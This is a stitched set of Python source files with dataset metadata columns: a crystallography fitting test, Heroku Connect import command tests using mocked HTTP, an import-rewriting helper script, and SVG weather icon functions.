def test_generalfitfunction():
# Ge example unstrained
pixX = np.array([1027.1099965580365, 1379.1700028337193, 1288.1100055910788, 926.219994375393, 595.4599989710869, 1183.2699986884652, 1672.670001029018, 1497.400007802548, 780.2700069727559, 819.9099991880139, 873.5600007021501, 1579.39000403102, 1216.4900044928474, 1481.199997684615, 399.87000836895436, 548.2499911593322, 1352.760007116035, 702.5200057620646, 383.7700117705855, 707.2000052800154, 1140.9300043834062, 1730.3299981313016, 289.68999155533413, 1274.8600008806216, 1063.2499947675371, 1660.8600022917144, 1426.670005812432])
pixY = np.array([1293.2799953573963, 1553.5800003037994, 1460.1599988550274, 872.0599978043742, 876.4400033114814, 598.9200007214372, 1258.6199918206175, 1224.7000037967478, 1242.530005349013, 552.8399954684833, 706.9700021553684, 754.63000554209, 1042.2800069222762, 364.8400055136739, 1297.1899933698528, 1260.320007366279, 568.0299942819768, 949.8800073732916, 754.580011319991, 261.1099917270594, 748.3999917806088, 1063.319998717625, 945.9700059216573, 306.9500110237749, 497.7900029269757, 706.310001700921, 858.780004244009])
miller_indices = np.array([[3.0, 3.0, 3.0], [2.0, 4.0, 2.0], [3.0, 5.0, 3.0], [5.0, 3.0, 3.0], [6.0, 2.0, 4.0], [6.0, 4.0, 2.0], [3.0, 5.0, 1.0], [4.0, 6.0, 2.0], [5.0, 3.0, 5.0], [7.0, 3.0, 3.0], [4.0, 2.0, 2.0], [5.0, 5.0, 1.0], [5.0, 5.0, 3.0], [7.0, 5.0, 1.0], [5.0, 1.0, 5.0], [3.0, 1.0, 3.0], [8.0, 6.0, 2.0], [7.0, 3.0, 5.0], [5.0, 1.0, 3.0], [9.0, 3.0, 3.0], [7.0, 5.0, 3.0], [5.0, 7.0, 1.0], [7.0, 1.0, 5.0], [5.0, 3.0, 1.0], [9.0, 5.0, 3.0], [7.0, 7.0, 1.0], [3.0, 3.0, 1.0]])
starting_orientmatrix = np.array([[-0.9727538909589738, -0.21247913537718385, 0.09274958034159074],
[0.22567394392094073, -0.7761682018781203, 0.5887564805829774],
[-0.053107604650232926, 0.593645098498364, 0.8029726516869564]])
# B0matrix = np.array([[0.17675651789659746, -2.8424615990749217e-17, -2.8424615990749217e-17],
# [0.0, 0.17675651789659746, -1.0823215193524997e-17],
# [0.0, 0.0, 0.17675651789659746]])
pixelsize = 0.08057
calibparameters = [69.196, 1050.78, 1116.22, 0.152, -0.251]
absolutespotsindices = np.arange(len(pixY))
#
varying_parameters_keys = ["anglex", "angley", "anglez", "a", "b", "alpha", "beta", "gamma", "depth"]
varying_parameters_values_array = [0.0, -0, 0.0, 5.678, 5.59, 89.999, 90, 90.0001, 0.02]
# varying_parameters_keys = ['distance','xcen','ycen','beta','gamma',
# 'anglex', 'angley', 'anglez',
# 'a', 'b', 'alpha', 'beta', 'gamma']
# varying_parameters_values_array = [68.5, 1049,1116,0,0,
# 0., -0, 0.,
# 5.678, 5.59, 89.999, 90, 90.0001]
# varying_parameters_keys = ['distance','xcen','ycen',
# 'anglex', 'angley', 'anglez',
# 'a', 'b', 'alpha', 'beta', 'gamma']
# varying_parameters_values_array = [68.9, 1050,1116,
# 0., -0, 0.,
# 5.678, 5.59, 89.999, 90, 90.0001]
# varying_parameters_keys = ['distance','ycen',
# 'anglex', 'angley', 'anglez',
# 'a', 'b', 'alpha', 'beta', 'gamma']
# varying_parameters_values_array = [68.9,1116,
# 0., -0, 0.,
# 5.675, 5.65, 89.999, 90, 90.0001]
latticeparameters = DictLT.dict_Materials["Ge"][1]
B0 = CP.calc_B_RR(latticeparameters)
transformparameters = [0, 0, 0, # 3 misorientation / initial UB matrix
1.0, 0, 0, 0, 1.0, 0, 0, -0.0, 1, # Tc
1, 0, 0, 0, 1, 0, 0, 0, 1, # T
1, 0, 0, 0, 1, 0, 0, 0, 1, ] # Ts
sourcedepth = [0]
allparameters = (calibparameters + transformparameters + latticeparameters + sourcedepth)
pureUmatrix, residualdistortion = GT.UBdecomposition_RRPP(starting_orientmatrix)
# print("len(allparameters)", len(allparameters))
# print("starting_orientmatrix", starting_orientmatrix)
# print("pureUmatrix", pureUmatrix)
refined_values = fit_function_general(varying_parameters_values_array,
varying_parameters_keys,
miller_indices,
allparameters,
absolutespotsindices,
pixX,
pixY,
UBmatrix_start=pureUmatrix,
B0matrix=B0,
nb_grains=1,
pureRotation=0,
verbose=0,
pixelsize=pixelsize,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0")
dictRes = {}
# print("\n****** Refined Values *********\n")
for paramname, val in zip(varying_parameters_keys, refined_values):
dictRes[paramname] = val
# print("%s => %.6f" % (paramname, val))
# print("\n*******************************\n")
return dictRes
| 45.301581
| 544
| 0.480609
| 11,396
| 123,175
| 5.033345
| 0.075553
| 0.045049
| 0.035286
| 0.031241
| 0.803591
| 0.780561
| 0.762622
| 0.738982
| 0.719474
| 0.70054
| 0
| 0.051983
| 0.421839
| 123,175
| 2,718
| 545
| 45.318249
| 0.753465
| 0.306889
| 0
| 0.746367
| 0
| 0
| 0.013735
| 0
| 0
| 0
| 0
| 0.00184
| 0
| 1
| 0.013871
| false
| 0.004624
| 0.008587
| 0
| 0.048217
| 0.01321
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
51f374cf2e6d3efe9a16f4ea270d5261811c448c
| 46
|
py
|
Python
|
apps/utils/admin/__init__.py
|
jorgesaw/oclock
|
2a78bd4d1ab40eaa65ea346cf8c37556fcbbeca5
|
[
"MIT"
] | null | null | null |
apps/utils/admin/__init__.py
|
jorgesaw/oclock
|
2a78bd4d1ab40eaa65ea346cf8c37556fcbbeca5
|
[
"MIT"
] | null | null | null |
apps/utils/admin/__init__.py
|
jorgesaw/oclock
|
2a78bd4d1ab40eaa65ea346cf8c37556fcbbeca5
|
[
"MIT"
] | null | null | null |
from .mixins import ActiveModelSuperUserMixin
| 23
| 45
| 0.891304
| 4
| 46
| 10.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 46
| 1
| 46
| 46
| 0.97619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a402aa5ddf72c3d863646de328a4d16dfecc437c
| 9,199
|
py
|
Python
|
tests/commands/test_import_mappings.py
|
Thermondo/django-heroku-connect
|
609ad3206731af3f6414a604a3559ffb559f0e26
|
[
"Apache-2.0"
] | 18
|
2017-11-30T12:52:56.000Z
|
2021-06-30T21:37:28.000Z
|
tests/commands/test_import_mappings.py
|
thermondo/django-heroku-connect
|
609ad3206731af3f6414a604a3559ffb559f0e26
|
[
"Apache-2.0"
] | 105
|
2017-12-01T10:46:14.000Z
|
2021-11-22T13:54:31.000Z
|
tests/commands/test_import_mappings.py
|
Thermondo/django-heroku-connect
|
609ad3206731af3f6414a604a3559ffb559f0e26
|
[
"Apache-2.0"
] | 5
|
2019-07-23T12:28:49.000Z
|
2020-10-12T18:28:24.000Z
|
import io
import json
import httpretty
import pytest
from django.core.management import CommandError, call_command
from heroku_connect.management.commands.import_mappings import Command
from tests import fixtures
class TestImportMapping:
@httpretty.activate
def test_app_name(self):
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/connections/1/actions/import",
data={"message": "success"},
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body=json.dumps(fixtures.connections),
status=200,
content_type="application/json",
)
call_command("import_mappings", "--app", "ninja")
@httpretty.activate
def test_connection_id(self):
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/connections/1/actions/import",
data={"message": "success"},
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body=json.dumps(fixtures.connections),
status=200,
content_type="application/json",
)
call_command("import_mappings", "--connection", "1")
@httpretty.activate
def test_no_app_no_connection_id(self):
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/connections/1/actions/import",
data={"message": "success"},
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body=json.dumps(fixtures.connections),
status=200,
content_type="application/json",
)
with pytest.raises(CommandError) as e:
call_command("import_mappings")
assert (
"You need ether specify the application name or the connection ID."
in str(e.value)
)
@httpretty.activate
def test_no_connections(self):
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/connections/1/actions/import",
data={"message": "success"},
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body=json.dumps({"results": []}),
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/users/me/apps/ninja/auth",
body=json.dumps({"results": []}),
status=200,
content_type="application/json",
)
with io.StringIO() as stdout:
with pytest.raises(CommandError) as e:
call_command(
"import_mappings",
"--app",
"ninja",
"--wait-interval",
"0", # don't need to wait when mocking calls
stdout=stdout,
)
stdout.seek(0)
console = stdout.read()
assert (
"No associated connections found"
" for the current user with the app 'ninja'."
) in str(e.value)
assert console == (
"Fetching connections.\n"
"No associated connections found for the current user with the app 'ninja'.\n"
"Linking the current user with Heroku Connect.\n"
"Fetching connections.\n"
)
@httpretty.activate
def test_authentication_failed(self):
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/connections/1/actions/import",
data={"message": "success"},
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body=json.dumps({"results": []}),
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/users/me/apps/ninja/auth",
body=json.dumps({"error": "permission denied"}),
status=403,
content_type="application/json",
)
with io.StringIO() as stdout:
with pytest.raises(CommandError) as e:
call_command("import_mappings", "--app", "ninja", stdout=stdout)
stdout.seek(0)
console = stdout.read()
assert "Authentication failed" in str(e.value)
assert console == (
"Fetching connections.\n"
"No associated connections found for the current user with the app 'ninja'.\n"
"Linking the current user with Heroku Connect.\n"
)
@httpretty.activate
def test_multiple_connections(self):
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/connections/1/actions/import",
data={"message": "success"},
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body=json.dumps({"results": [fixtures.connection, fixtures.connection]}),
status=200,
content_type="application/json",
)
with pytest.raises(CommandError) as e:
call_command("import_mappings", "--app", "ninja")
assert (
"More than one associated connections found"
" for the current user with the app 'ninja'."
" Please specify the connection ID."
) in str(e.value)
@httpretty.activate
def test_upload_failed(self):
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/connections/1/actions/import",
data={"error": "internal server error"},
status=500,
content_type="application/json",
)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body=json.dumps(fixtures.connections),
status=200,
content_type="application/json",
)
with pytest.raises(CommandError) as e:
call_command("import_mappings", "--app", "ninja")
assert "Failed to upload the mapping" in str(e.value)
@httpretty.activate
def test_load_connection_failed(self):
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body="{'error': 'internal server error'}",
status=500,
content_type="application/json",
)
with pytest.raises(CommandError) as e:
call_command("import_mappings", "--app", "ninja")
assert "Failed to load connections" in str(e.value)
@httpretty.activate
def test_waiting(self):
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections/1",
body=json.dumps(fixtures.connection),
status=200,
content_type="application/json",
)
Command().wait_for_import("1", 0)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections/2",
data={"error": "internal server error"},
status=500,
content_type="application/json",
)
with pytest.raises(CommandError) as e:
Command().wait_for_import("2", 0)
assert "Failed to fetch connection information." in str(e.value)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections/1",
body=json.dumps(fixtures.connection),
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.POST,
"https://connect-eu.heroku.com/api/v3/connections/1/actions/import",
data={"message": "success"},
status=200,
content_type="application/json",
)
httpretty.register_uri(
httpretty.GET,
"https://connect-eu.heroku.com/api/v3/connections",
body=json.dumps(fixtures.connections),
status=200,
content_type="application/json",
)
call_command(
"import_mappings", "--app", "ninja", "--wait", "--wait-interval", "0"
)
| 35.933594
| 90
| 0.563866
| 942
| 9,199
| 5.410828
| 0.121019
| 0.073377
| 0.086325
| 0.125172
| 0.87267
| 0.855405
| 0.854228
| 0.852658
| 0.835393
| 0.817344
| 0
| 0.017167
| 0.316121
| 9,199
| 255
| 91
| 36.07451
| 0.793038
| 0.004022
| 0
| 0.709544
| 0
| 0.041494
| 0.300764
| 0
| 0
| 0
| 0
| 0
| 0.037344
| 1
| 0.037344
| false
| 0
| 0.112033
| 0
| 0.153527
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfe21da6aca97f585d01fe95da36e08f29e5e2fb
| 1,141
|
py
|
Python
|
satgenpy/satgen/dynamic_mcnf_paper_code/module.py
|
kalelpida/hypatia
|
c10b63592b3229a35dbdc1d5b70b5e80ebc256bd
|
[
"MIT"
] | 1
|
2022-03-18T15:42:45.000Z
|
2022-03-18T15:42:45.000Z
|
satgenpy/satgen/dynamic_mcnf_paper_code/module.py
|
kalelpida/hypatia
|
c10b63592b3229a35dbdc1d5b70b5e80ebc256bd
|
[
"MIT"
] | null | null | null |
satgenpy/satgen/dynamic_mcnf_paper_code/module.py
|
kalelpida/hypatia
|
c10b63592b3229a35dbdc1d5b70b5e80ebc256bd
|
[
"MIT"
] | null | null | null |
import os
modules_non_pointes=["multiprocessing"]
def depointe():
""" enlever les '.' dans from .xxx import yyy -> on obtient from xxx import yyy"""
for fic in (liste_fic:=os.listdir(".")):
if os.path.isfile(fic) and not fic.startswith("_") and not fic.startswith('.'):
with open(fic,"r") as fin:
lignes=fin.readlines()
with open(fic,'w') as fout:
for i in range(len(lignes)):
ligne=lignes[i]
if ligne.startswith("from"):
mots=ligne.split()
mots[1]=mots[1].strip('.')
lignes[i]=" ".join(mots)+"\n"
fout.writelines(lignes)
def pointe():
""" ajouter des '.' dans from xxx import yyy -> on obtient from .xxx import yyy"""
for fic in (liste_fic:=os.listdir(".")):
if os.path.isfile(fic) and not fic.startswith("_") and not fic.startswith('.'):
with open(fic,"r") as fin:
lignes=fin.readlines()
with open(fic,'w') as fout:
for i in range(len(lignes)):
ligne=lignes[i]
if ligne.startswith("from"):
mots=ligne.split()
if mots[1] not in modules_non_pointes:
mots[1]="."+mots[1]
lignes[i]=" ".join(mots)+"\n"
fout.writelines(lignes)
| 31.694444
| 83
| 0.617003
| 171
| 1,141
| 4.070175
| 0.292398
| 0.03592
| 0.074713
| 0.091954
| 0.807471
| 0.807471
| 0.807471
| 0.807471
| 0.704023
| 0.704023
| 0
| 0.00547
| 0.198948
| 1,141
| 35
| 84
| 32.6
| 0.756018
| 0.13234
| 0
| 0.758621
| 0
| 0
| 0.042008
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.034483
| 0
| 0.103448
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfee7c528676afd423c2020563c3617983153b91
| 10,537
|
py
|
Python
|
host-server/var/lib/kindle-weather-host/geticon.py
|
Neelakurinji123/kindle-weather-display
|
bacf32b8f244aa7faaa4e756ae1b7dde2d1bb6ca
|
[
"MIT"
] | 19
|
2021-04-29T02:22:13.000Z
|
2022-01-11T19:41:58.000Z
|
host-server/var/lib/kindle-weather-host/geticon.py
|
Neelakurinji123/kindle-weather-display
|
bacf32b8f244aa7faaa4e756ae1b7dde2d1bb6ca
|
[
"MIT"
] | null | null | null |
host-server/var/lib/kindle-weather-host/geticon.py
|
Neelakurinji123/kindle-weather-display
|
bacf32b8f244aa7faaa4e756ae1b7dde2d1bb6ca
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# Published March 2015
# Author : Greg Fabre - http://www.iero.org
# Based on Noah Blon's work : http://codepen.io/noahblon/details/lxukH
# Public domain source code
def getHome() :
return '<g transform="matrix(6.070005,0,0,5.653153,292.99285,506.46284)"><path d="M 42,48 C 29.995672,48.017555 18.003366,48 6,48 L 6,27 c 0,-0.552 0.447,-1 1,-1 0.553,0 1,0.448 1,1 l 0,19 c 32.142331,0.03306 13.954169,0 32,0 l 0,-18 c 0,-0.552 0.447,-1 1,-1 0.553,0 1,0.448 1,1 z"/><path d="m 47,27 c -0.249,0 -0.497,-0.092 -0.691,-0.277 L 24,5.384 1.691,26.723 C 1.292,27.104 0.659,27.091 0.277,26.692 -0.105,26.293 -0.09,25.66 0.308,25.278 L 24,2.616 47.691,25.277 c 0.398,0.382 0.413,1.015 0.031,1.414 C 47.526,26.896 47.264,27 47,27 Z"/><path d="m 39,15 c -0.553,0 -1,-0.448 -1,-1 L 38,8 32,8 C 31.447,8 31,7.552 31,7 31,6.448 31.447,6 32,6 l 8,0 0,8 c 0,0.552 -0.447,1 -1,1 z" /></g>'
# Forecast.io icons
# clear-day, clear-night, rain, snow, sleet, wind, fog, cloudy, partly-cloudy-day, or partly-cloudy-night.
def getClearDay() :
return '<path d="M71.997,51.999h-3.998c-1.105,0-2-0.895-2-1.999s0.895-2,2-2h3.998 c1.105,0,2,0.896,2,2S73.103,51.999,71.997,51.999z M64.142,38.688c-0.781,0.781-2.049,0.781-2.828,0 c-0.781-0.781-0.781-2.047,0-2.828l2.828-2.828c0.779-0.781,2.047-0.781,2.828,0c0.779,0.781,0.779,2.047,0,2.828L64.142,38.688z M50.001,61.998c-6.627,0-12-5.372-12-11.998c0-6.627,5.372-11.999,12-11.999c6.627,0,11.998,5.372,11.998,11.999 C61.999,56.626,56.628,61.998,50.001,61.998z M50.001,42.001c-4.418,0-8,3.581-8,7.999c0,4.417,3.583,7.999,8,7.999 s7.998-3.582,7.998-7.999C57.999,45.582,54.419,42.001,50.001,42.001z M50.001,34.002c-1.105,0-2-0.896-2-2v-3.999 c0-1.104,0.895-2,2-2c1.104,0,2,0.896,2,2v3.999C52.001,33.106,51.104,34.002,50.001,34.002z M35.86,38.688l-2.828-2.828 c-0.781-0.781-0.781-2.047,0-2.828s2.047-0.781,2.828,0l2.828,2.828c0.781,0.781,0.781,2.047,0,2.828S36.641,39.469,35.86,38.688z M34.002,50c0,1.104-0.896,1.999-2,1.999h-4c-1.104,0-1.999-0.895-1.999-1.999s0.896-2,1.999-2h4C33.107,48,34.002,48.896,34.002,50 z M35.86,61.312c0.781-0.78,2.047-0.78,2.828,0c0.781,0.781,0.781,2.048,0,2.828l-2.828,2.828c-0.781,0.781-2.047,0.781-2.828,0 c-0.781-0.78-0.781-2.047,0-2.828L35.86,61.312z M50.001,65.998c1.104,0,2,0.895,2,1.999v4c0,1.104-0.896,2-2,2 c-1.105,0-2-0.896-2-2v-4C48.001,66.893,48.896,65.998,50.001,65.998z M64.142,61.312l2.828,2.828c0.779,0.781,0.779,2.048,0,2.828 c-0.781,0.781-2.049,0.781-2.828,0l-2.828-2.828c-0.781-0.78-0.781-2.047,0-2.828C62.093,60.531,63.36,60.531,64.142,61.312z" />'
def getClearNight() :
return '<path d="M50,61.998c-6.627,0-11.999-5.372-11.999-11.998 c0-6.627,5.372-11.999,11.999-11.999c0.755,0,1.491,0.078,2.207,0.212c-0.132,0.576-0.208,1.173-0.208,1.788 c0,4.418,3.582,7.999,8,7.999c0.615,0,1.212-0.076,1.788-0.208c0.133,0.717,0.211,1.452,0.211,2.208 C61.998,56.626,56.626,61.998,50,61.998z M48.212,42.208c-3.556,0.813-6.211,3.989-6.211,7.792c0,4.417,3.581,7.999,7.999,7.999 c3.802,0,6.978-2.655,7.791-6.211C52.937,50.884,49.115,47.062,48.212,42.208z" />'
def getRain() :
return '<path d="m 59.999,65.64 c -0.266,0 -0.614,0 -1,0 0,-1.372 -0.319,-2.742 -0.943,-4 0.777,0 1.451,0 1.943,0 4.418,0 7.999,-3.58 7.999,-7.998 0,-4.418 -3.581,-7.999 -7.999,-7.999 -1.6,0 -3.083,0.481 -4.334,1.29 -1.231,-5.316 -5.973,-9.289 -11.664,-9.289 -6.627,0 -11.998,5.372 -11.998,11.998 0,5.953 4.339,10.879 10.023,11.822 -0.637,1.217 -0.969,2.549 -1.012,3.887 -7.406,-1.399 -13.012,-7.895 -13.012,-15.709 0,-8.835 7.162,-15.998 15.998,-15.998 6.004,0 11.229,3.312 13.965,8.204 0.664,-0.114 1.337,-0.205 2.033,-0.205 6.627,0 11.998,5.372 11.998,11.999 0,6.627 -5.37,11.998 -11.997,11.998 z m -9.998,-7.071 3.535,3.535 c 1.951,1.953 1.951,5.118 0,7.07 -1.953,1.953 -5.119,1.953 -7.07,0 -1.953,-1.952 -1.953,-5.117 0,-7.07 l 3.535,-3.535 z" />'
def getSnow() :
return '<path d="M63.999,64.943v-4.381c2.389-1.385,3.999-3.963,3.999-6.922 c0-4.416-3.581-7.998-7.999-7.998c-1.6,0-3.083,0.48-4.333,1.291c-1.231-5.317-5.974-9.291-11.665-9.291 c-6.627,0-11.998,5.373-11.998,12c0,3.549,1.55,6.729,4,8.924v4.916c-4.777-2.768-8-7.922-8-13.84 c0-8.836,7.163-15.999,15.998-15.999c6.004,0,11.229,3.312,13.965,8.204c0.664-0.113,1.337-0.205,2.033-0.205 c6.627,0,11.999,5.373,11.999,11.998C71.998,58.863,68.655,63.293,63.999,64.943z M42.001,57.641c1.105,0,2,0.896,2,2 c0,1.105-0.895,2-2,2c-1.104,0-1.999-0.895-1.999-2C40.002,58.537,40.897,57.641,42.001,57.641z M42.001,65.641c1.105,0,2,0.895,2,2 c0,1.104-0.895,1.998-2,1.998c-1.104,0-1.999-0.895-1.999-1.998C40.002,66.535,40.897,65.641,42.001,65.641z M50.001,61.641 c1.104,0,2,0.895,2,2c0,1.104-0.896,2-2,2c-1.105,0-2-0.896-2-2C48.001,62.535,48.896,61.641,50.001,61.641z M50.001,69.639 c1.104,0,2,0.896,2,2c0,1.105-0.896,2-2,2c-1.105,0-2-0.895-2-2C48.001,70.535,48.896,69.639,50.001,69.639z M57.999,57.641 c1.105,0,2,0.896,2,2c0,1.105-0.895,2-2,2c-1.104,0-1.999-0.895-1.999-2C56,58.537,56.896,57.641,57.999,57.641z M57.999,65.641 c1.105,0,2,0.895,2,2c0,1.104-0.895,1.998-2,1.998c-1.104,0-1.999-0.895-1.999-1.998C56,66.535,56.896,65.641,57.999,65.641z" />'
def getSleet() :
return getSnow()
def getWind() :
return '<path d="m 36.487886,31.712413 -7.4209,5.614747 -1.239742,0 0,-1.686046 -3.613959,0 0,32.148333 3.613959,0 0,-28.954574 1.286522,0 6.438465,4.155668 0.935655,0.04863 c 6.772487,-0.02017 8.174561,5.572594 20.993709,5.571513 4.65253,10e-4 6.520094,-1.29179 9.210331,-1.280746 4.597097,-0.01101 8.812682,2.102152 8.812682,2.102152 l 2.473633,-7.122458 c 0,0 -6.264433,-4.48985 -16.68386,-4.479907 -0.702187,-0.0099 -2.173664,0.189825 -3.070114,0.183735 -8.933613,0.006 -4.236867,-6.314021 -21.736381,-6.301051 z m -0.09357,1.048376 -0.742677,9.408344 -6.286419,-4.112434 7.029096,-5.29591 z" />'
def getFog() :
return '<path d="M29.177,55.641c-0.262-0.646-0.473-1.315-0.648-2h43.47 c0,0.684-0.07,1.348-0.181,2H29.177z M36.263,35.643c2.294-1.271,4.93-1.999,7.738-1.999c2.806,0,5.436,0.73,7.727,1.999H36.263z M28.142,47.642c0.085-0.682,0.218-1.347,0.387-1.999h40.396c0.551,0.613,1.039,1.281,1.455,1.999H28.142z M29.177,43.643 c0.281-0.693,0.613-1.359,0.984-2h27.682c0.04,0.068,0.084,0.135,0.123,0.205c0.664-0.114,1.338-0.205,2.033-0.205 c2.451,0,4.729,0.738,6.627,2H29.177z M31.524,39.643c0.58-0.723,1.225-1.388,1.92-2h21.122c0.69,0.61,1.326,1.28,1.903,2H31.524z M71.817,51.641H28.142c-0.082-0.656-0.139-1.32-0.139-1.999h43.298C71.528,50.285,71.702,50.953,71.817,51.641z M71.301,57.641 c-0.247,0.699-0.555,1.367-0.921,2H31.524c-0.505-0.629-0.957-1.299-1.363-2H71.301z M33.444,61.641h35.48 c-0.68,0.758-1.447,1.434-2.299,1.999H36.263C35.247,63.078,34.309,62.4,33.444,61.641z" />'
def getCloudy() :
return '<path d="M43.945,65.639c-8.835,0-15.998-7.162-15.998-15.998 c0-8.836,7.163-15.998,15.998-15.998c6.004,0,11.229,3.312,13.965,8.203c0.664-0.113,1.338-0.205,2.033-0.205 c6.627,0,11.999,5.373,11.999,12c0,6.625-5.372,11.998-11.999,11.998C57.168,65.639,47.143,65.639,43.945,65.639z M59.943,61.639 c4.418,0,8-3.582,8-7.998c0-4.418-3.582-8-8-8c-1.6,0-3.082,0.481-4.333,1.291c-1.231-5.316-5.974-9.29-11.665-9.29 c-6.626,0-11.998,5.372-11.998,11.999c0,6.626,5.372,11.998,11.998,11.998C47.562,61.639,56.924,61.639,59.943,61.639z" />'
def getPartlyCloudyDay() :
return '<path d="m 70.964271,47.439013 -3.309389,0 c -0.913392,0 -1.654695,-0.740476 -1.654695,-1.654695 0,-0.913391 0.741303,-1.65304 1.654695,-1.65304 l 3.309389,0 c 0.913392,0 1.654695,0.740476 1.654695,1.65304 0,0.914219 -0.741303,1.654695 -1.654695,1.654695 z M 64.463803,36.425365 c -0.646158,0.646158 -1.69358,0.646158 -2.339738,0 -0.646158,-0.645331 -0.646158,-1.69358 0,-2.338911 l 2.339738,-2.339739 c 0.646158,-0.646158 1.69358,-0.646158 2.339738,0 0.646159,0.645331 0.646159,1.69358 0,2.339739 l -2.339738,2.338911 z m -2.438193,12.91241 0,0 c 1.447031,1.725847 2.321537,3.946447 2.321537,6.374711 0,5.481177 -4.44451,9.926514 -9.927341,9.926514 -2.295889,0 -10.590873,0 -13.235903,0 -7.309614,0 -13.235903,-5.925462 -13.235903,-13.235903 0,-7.310441 5.926289,-13.235903 13.235903,-13.235903 1.30059,0 2.556503,0.191944 3.742092,0.541085 1.816028,-2.338911 4.648038,-3.850475 7.839116,-3.850475 5.482831,0 9.927341,4.445338 9.927341,9.926514 -8.27e-4,1.253431 -0.24324,2.449776 -0.666842,3.553457 z m -30.769048,3.065322 c 0,5.482831 4.443683,9.926514 9.926514,9.926514 2.991688,0 10.738141,0 13.235903,0 3.65522,0 6.617951,-2.963559 6.617951,-6.617125 0,-3.65522 -2.962731,-6.618779 -6.617951,-6.618779 -1.323756,0 -2.550712,0.398782 -3.584896,1.068106 -1.018465,-4.398179 -4.942573,-7.68523 -9.651007,-7.68523 -5.482831,0 -9.926514,4.443683 -9.926514,9.926514 z M 52.764284,39.167194 c -1.830092,0 -3.487269,0.742958 -4.684441,1.943439 1.935993,1.188071 3.545184,2.85683 4.657139,4.843291 0.549358,-0.09349 1.106163,-0.169606 1.681997,-0.169606 1.758113,0 3.407844,0.462487 4.839982,1.263359 l 0,0 c 0.07943,-0.408709 0.124102,-0.830656 0.124102,-1.263359 0,-3.653566 -2.963558,-6.617124 -6.618779,-6.617124 z m 0,-6.618779 c -0.913391,0 -1.653867,-0.740476 -1.653867,-1.653867 l 0,-3.308563 c 0,-0.914218 0.741303,-1.654694 1.653867,-1.654694 0.914219,0 1.654695,0.740476 1.654695,1.654694 l 0,3.308563 c 0,0.914218 -0.739649,1.653867 -1.654695,1.653867 z m -11.698692,3.87695 -2.338911,-2.338911 c -0.646158,-0.646159 -0.646158,-1.694408 0,-2.339739 0.645331,-0.646158 1.69358,-0.646158 2.338911,0 l 2.339739,2.339739 c 0.646158,0.645331 0.646158,1.69358 0,2.338911 -0.645331,0.646158 -1.69358,0.646158 -2.339739,0 z" />'
def getPartlyCloudyNight() :
